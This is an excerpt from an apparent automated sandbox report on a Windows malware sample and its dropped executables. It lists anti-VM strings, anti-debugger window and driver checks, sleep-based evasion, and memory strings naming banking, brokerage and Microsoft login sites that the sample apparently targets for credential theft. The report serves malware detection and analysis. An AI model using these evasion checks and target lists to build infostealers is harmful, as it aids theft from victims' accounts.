                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2608 Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8072 Thread sleep count: 461 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7208 Thread sleep time: -4611686018427385s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8152 Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4024 Thread sleep count: 4162 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7888Thread sleep time: -11068046444225724s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3596Thread sleep count: 1096 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7760Thread sleep time: -1844674407370954s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe TID: 7248Thread sleep time: -300000s >= -30000s
                                Source: C:\Users\Public\Netstat\FuturreApp.exe TID: 6408Thread sleep time: -884200s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8080Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7176Thread sleep time: -1844674407370954s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8140Thread sleep count: 1074 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7896Thread sleep count: 252 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7324Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5352Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe TID: 7252Thread sleep time: -240000s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe TID: 7524Thread sleep time: -180000s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe TID: 7148Thread sleep time: -30000s >= -30000s
                                Source: C:\Windows\System32\cmd.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                                Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                                Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                                Source: C:\Windows\System32\attrib.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                                Source: C:\Users\Public\Netstat\FuturreApp.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Last function: Thread delayed
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Last function: Thread delayed
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Last function: Thread delayed
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Last function: Thread delayed
                                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                                Source: C:\Users\user\Desktop\file.exe | File Volume queried: C:\ FullSizeInformation
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Code function: 5_2_00007FF67AED83B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,5_2_00007FF67AED83B0
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Code function: 5_2_00007FF67AED92F0 FindFirstFileExW,FindClose,5_2_00007FF67AED92F0
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Code function: 5_2_00007FF67AEF18E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,5_2_00007FF67AEF18E4
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Code function: 6_2_00007FF67AED92F0 FindFirstFileExW,FindClose,6_2_00007FF67AED92F0
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Code function: 6_2_00007FF67AED83B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,6_2_00007FF67AED83B0
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Code function: 6_2_00007FF67AEF18E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,6_2_00007FF67AEF18E4
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Thread delayed: delay time: 30000
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                                Source: D1UL0FG.exe, 00000006.00000003.2481469057.000001FA2E2A0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vboxtrayZ
                                Source: getmac.exe, 00000046.00000003.2616665075.0000015F4B8EE000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000046.00000002.2619297587.0000015F4B90E000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000046.00000003.2616200120.0000015F4B8DB000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000046.00000003.2616200120.0000015F4B900000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000046.00000003.2616665075.0000015F4B900000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000046.00000003.2616812229.0000015F4B90D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V
                                Source: FuturreApp.exe, 00000055.00000002.7288711538.000000006BD70000.00000002.00000001.01000000.00000027.sdmp | Binary or memory string: VMware
                                Source: D1UL0FG.exe, 00000006.00000002.2993365618.000001FA2E130000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vboxservice
                                Source: d0ef52de9f.exe, 0000005F.00000003.2853107923.00000000037CF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
                                Source: d0ef52de9f.exe, 0000005F.00000003.2853107923.00000000037CF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                                Source: d0ef52de9f.exe, 0000005F.00000003.2853107923.00000000037CF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696428655
                                Source: 8ZVMneG.exe, 00000054.00000003.2855490100.0000000003BF3000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: - GDCDYNVMware20,11696428655p
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001310000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2591687772.000001FA2DFF8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2986166870.000001FA2DFF8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2601233115.000001FA2DFF8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2641077930.000001FA2DFF8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000002.2992431014.000001FA2DFF8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2537129441.000001FA2DFF1000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2491526222.000001FA2DFF9000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000046.00000002.2619297587.0000015F4B90E000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000046.00000003.2616200120.0000015F4B900000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000046.00000003.2616665075.0000015F4B900000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                                Source: m9sfEU9.exe, 00000051.00000003.2645107940.0000000000F6A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                                Source: D1UL0FG.exe, 00000006.00000002.2993365618.000001FA2E130000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmsrvc
                                Source: d0ef52de9f.exe, 0000005F.00000003.2853107923.00000000037CF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
                                Source: FuturreApp.exe, 00000055.00000002.7284709155.00000000050D0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWj
                                Source: d0ef52de9f.exe, 0000005F.00000003.2853107923.00000000037CF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                                Source: D1UL0FG.exe, 00000006.00000003.2481469057.000001FA2E2A0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vmsrvcZ
                                Source: D1UL0FG.exe, 00000006.00000002.2993365618.000001FA2E130000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: qemu-ga
                                Source: d0ef52de9f.exe, 0000005F.00000003.2853107923.00000000037CF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696428655
                                Source: d0ef52de9f.exe, 0000005F.00000003.2853107923.00000000037CF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696428655o
                                Source: D1UL0FG.exe, 00000006.00000002.2993365618.000001FA2E130000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmware
                                Source: d0ef52de9f.exe, 0000005F.00000003.2853107923.00000000037CF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696428655
                                Source: d0ef52de9f.exe, 0000005F.00000003.2853107923.00000000037CF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696428655t
                                Source: d0ef52de9f.exe, 0000005F.00000003.2853107923.00000000037CF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                                Source: D1UL0FG.exe, 00000006.00000002.2993365618.000001FA2E130000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmusrvc
                                Source: 8ZVMneG.exe, 00000054.00000003.2855490100.0000000003BF3000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: YNVMware
                                Source: d0ef52de9f.exe, 0000005F.00000003.2853107923.00000000037CF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
                                Source: D1UL0FG.exe, 00000006.00000003.2481469057.000001FA2E2A0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vmusrvcZ
                                Source: d0ef52de9f.exe, 0000005F.00000003.2853107923.00000000037CF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696428655x
                                Source: D1UL0FG.exe, 00000006.00000002.2993365618.000001FA2E130000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmwareservice
                                Source: d0ef52de9f.exe, 0000005F.00000003.2853107923.00000000037CF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                                Source: skotes.exe, skotes.exe, 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000059.00000002.2798355053.0000000000889000.00000040.00000001.01000000.00000007.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                                Source: D1UL0FG.exe, 00000006.00000003.2481469057.000001FA2E2A0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vmwareservicer6
                                Source: d0ef52de9f.exe, 0000005F.00000003.2853107923.00000000037CF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
                                Source: file.exe, 00000000.00000003.2213884609.0000000000C04000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                Source: d0ef52de9f.exe, 0000005F.00000003.2853107923.00000000037CF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696428655f
                                Source: D1UL0FG.exe, 00000006.00000002.2993365618.000001FA2E130000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmwareuser
                                Source: getmac.exe, 00000046.00000003.2617329269.0000015F4B921000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000046.00000003.2616200120.0000015F4B900000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000046.00000003.2616665075.0000015F4B900000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000046.00000003.2616610537.0000015F4B91F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SetPropValue.sSubKeyName("SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage");
                                Source: d0ef52de9f.exe, 0000005F.00000003.2853107923.00000000037CF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
                                Source: FuturreApp.exe, 00000055.00000002.7288711538.000000006BD70000.00000002.00000001.01000000.00000027.sdmp | Binary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla
                                Source: d0ef52de9f.exe, 0000005F.00000003.2853107923.00000000037CF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                                Source: d0ef52de9f.exe, 0000005F.00000003.2853107923.00000000037CF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                                Source: D1UL0FG.exe, 00000006.00000003.2481469057.000001FA2E2A0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vboxserviceZ
                                Source: D1UL0FG.exe, 00000006.00000002.2993365618.000001FA2E130000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmwaretray
                                Source: d0ef52de9f.exe, 0000005F.00000003.2853107923.00000000037CF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                                Source: D1UL0FG.exe, 00000006.00000003.2481469057.000001FA2E2A0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vmwareservicer6Z
                                Source: D1UL0FG.exe, 00000006.00000003.2806746035.000001FA2E72F000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2806746035.000001FA2E772000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2806171979.000001FA2E5B6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
                                Source: d0ef52de9f.exe, 0000005F.00000003.2853107923.00000000037CF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
                                Source: d0ef52de9f.exe, 0000005F.00000003.2853107923.00000000037CF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                                Source: d0ef52de9f.exe, 0000005F.00000003.2853107923.00000000037CF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696428655t
                                Source: skotes.exe, 00000003.00000002.7284592983.00000000012CE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW@F1
                                Source: d0ef52de9f.exe, 0000005F.00000003.2853107923.00000000037CF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                                Source: d0ef52de9f.exe, 0000005F.00000003.2853107923.00000000037CF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                                Source: d0ef52de9f.exe, 0000005F.00000003.2853107923.00000000037CF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696428655s
                                Source: d0ef52de9f.exe, 0000005F.00000003.2853107923.00000000037CF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                                Source: d0ef52de9f.exe, 0000005F.00000003.2853107923.00000000037CF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696428655
                                Source: D1UL0FG.exe, 00000006.00000002.2993365618.000001FA2E130000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vboxtray
                                Source: m9sfEU9.exe, 00000051.00000003.2645107940.0000000000F6A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                Source: d0ef52de9f.exe, 0000005F.00000003.2853107923.00000000037CF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                                Source: getmac.exe, 00000046.00000003.2617329269.0000015F4B921000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000046.00000003.2616200120.0000015F4B900000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000046.00000003.2616610537.0000015F4B91F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExport
                                Source: getmac.exe, 00000046.00000002.2619297587.0000015F4B90E000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000046.00000003.2616200120.0000015F4B900000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000046.00000003.2616665075.0000015F4B900000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000046.00000003.2616812229.0000015F4B90D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Win32_NetworkProtocolHyper-V RAWHyper-VRAWHyper-V RAW
                                Source: d0ef52de9f.exe, 0000005F.00000003.2853107923.00000000037CF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696428655j
                                Source: d0ef52de9f.exe, 0000005F.00000003.2853107923.00000000037CF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
                                Source: D1UL0FG.exe, 00000006.00000003.2481469057.000001FA2E2A0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vmwareuserZ
                                Source: FuturreApp.exe, 00000055.00000002.7288711538.000000006BD70000.00000002.00000001.01000000.00000027.sdmp | Binary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
                                Source: D1UL0FG.exe, 00000006.00000003.2481469057.000001FA2E2A0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: qemu-gaZ
                                Source: getmac.exe, 00000046.00000003.2617329269.0000015F4B921000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000046.00000003.2616200120.0000015F4B900000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000046.00000003.2616610537.0000015F4B91F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage
                                Source: FuturreApp.exe, 00000055.00000002.7288711538.000000006BD70000.00000002.00000001.01000000.00000027.sdmp | Binary or memory string: VMWare
                                Source: D1UL0FG.exe, 00000006.00000003.2481469057.000001FA2E2A0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vmtoolsd
                                Source: D1UL0FG.exe, 00000006.00000003.2481469057.000001FA2E2A0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vmwarec
                                Source: getmac.exe, 00000046.00000003.2616665075.0000015F4B8EE000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000046.00000003.2616200120.0000015F4B8DB000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000046.00000003.2617043696.0000015F4B8EF000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000046.00000002.2618217490.0000015F4B8EF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ssubkeyname"system\currentcontrolset\services\hyper-v\linkage"
                                Source: D1UL0FG.exe, 00000006.00000003.2481469057.000001FA2E2A0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vmwaretrayZ
                                Source: file.exe, 00000000.00000002.2246342884.0000000000459000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.2310649956.0000000000889000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000059.00000002.2798355053.0000000000889000.00000040.00000001.01000000.00000007.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                                Source: d0ef52de9f.exe, 0000005F.00000003.2853107923.00000000037CF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                                Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
                                Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

                                Anti Debugging

                                Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Thread information set: HideFromDebugger (×3)
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe | Thread information set: HideFromDebugger
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe | Open window title or class name: regmonclass
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe | Open window title or class name: gbdyllo
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe | Open window title or class name: procmon_window_class
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe | Open window title or class name: ollydbg
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe | Open window title or class name: filemonclass
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe | File opened: NTICE
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe | File opened: SICE
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe | File opened: SIWVID
                                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort (×3)
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process queried: DebugPort (×9)
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe | Process queried: DebugPort (×3)
                                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_04AC069B rdtsc 0_2_04AC069B
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Code function: 5_2_00007FF67AEDD19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FF67AEDD19C
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Code function: 6_2_00007FF8A8AA6EE0 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,6_2_00007FF8A8AA6EE0
                                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0029652B mov eax, dword ptr fs:[00000030h] 0_2_0029652B
                                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0029A302 mov eax, dword ptr fs:[00000030h] 0_2_0029A302
